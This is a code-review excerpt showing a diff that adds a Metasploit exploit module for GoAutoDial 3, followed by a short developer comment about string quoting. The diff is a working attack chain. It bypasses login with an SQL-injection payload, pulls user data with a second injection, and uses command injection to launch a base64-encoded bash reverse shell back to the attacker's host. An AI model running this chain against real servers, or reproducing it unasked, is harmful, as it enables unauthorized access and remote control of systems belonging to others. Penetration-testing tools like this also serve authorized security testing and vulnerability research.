modules/exploits/linux/http/goautodial_3_rce_command_injection.rb

```diff
@@ -0,0 +1,141 @@
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris McCurley',  # Discovery & Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-2843'],
+          ['CVE', '2015-2845']
+        ],
+      'Platform'       => %w{ linux },
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 21 2015"))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The target port', 443]),
+        OptBool.new('SSL', [false, 'Use SSL', true])
+      ])
+  end
+
+
+  def check
+    res = check_version()
+    if res and res.body =~ /1421902800/
+      return Exploit::CheckCode::Safe
+    else
+      return Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def check_version()
+    send_request_cgi({
+    'method'    => 'GET',
+    'uri'       => "/changelog.txt",
+    'headers'   => {
+    'User-Agent' => 'Mozilla/5.0',
+    'Accept-Encoding' => 'identity'
+    }
+    })
+  end
+
+  def sqli_auth_bypass()
+
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => "/index.php/go_login/validate_credentials",
+      'headers'   =>
+        {
+        'User-Agent' => 'Mozilla/5.0',
+        'Accept-Encoding' => 'identity'
+        },
+      'vars_post' =>
+        {
+        'user_name'   => 'admin',
+        'user_pass'   => "' or '1'='1"
+        }
+    })
+  end
+
+  def sqli_admin_pass(cookies)
+
+   send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => "/index.php/go_site/go_get_user_info/'%20OR%20active='Y",
+      'headers'   =>
+        {
+        'User-Agent' => 'Mozilla/5.0',
+        'Accept-Encoding' => 'identity',
+        'Cookie' => cookies
+        }
+      })
+  end
+
+  def exec_command(cookies)
+    payload = "bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"
+    encoded = "#{Rex::Text.encode_base64(payload)}"
+    params = "||%20bash%20-c%20\"eval%20\`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
+
+    send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => "/index.php/go_site/cpanel/"+ params,
+      'headers'   => {
+      'User-Agent' => 'Mozilla/5.0',
+      'Accept-Encoding' => 'identity',
+      'Cookie' => cookies
+      }
+      })
+  end
+
+  #
+  # Run the actual exploit
+  #
+  def run_it()
+    print_status("#{rhost}:#{rport} - Trying SQL injection...")
+    res1 = sqli_auth_bypass()
+
+    if res1 && res1.code == 200
+      print_good("Authentication Bypass (SQLi) was successful")
```

Comment:
Ok so was thinking of just using single quotes.. but then that won't work with the whole interpolation thing. So I'll just do what was suggested anyhow with the updates I make *hopefully* before I go afk for a few weeks.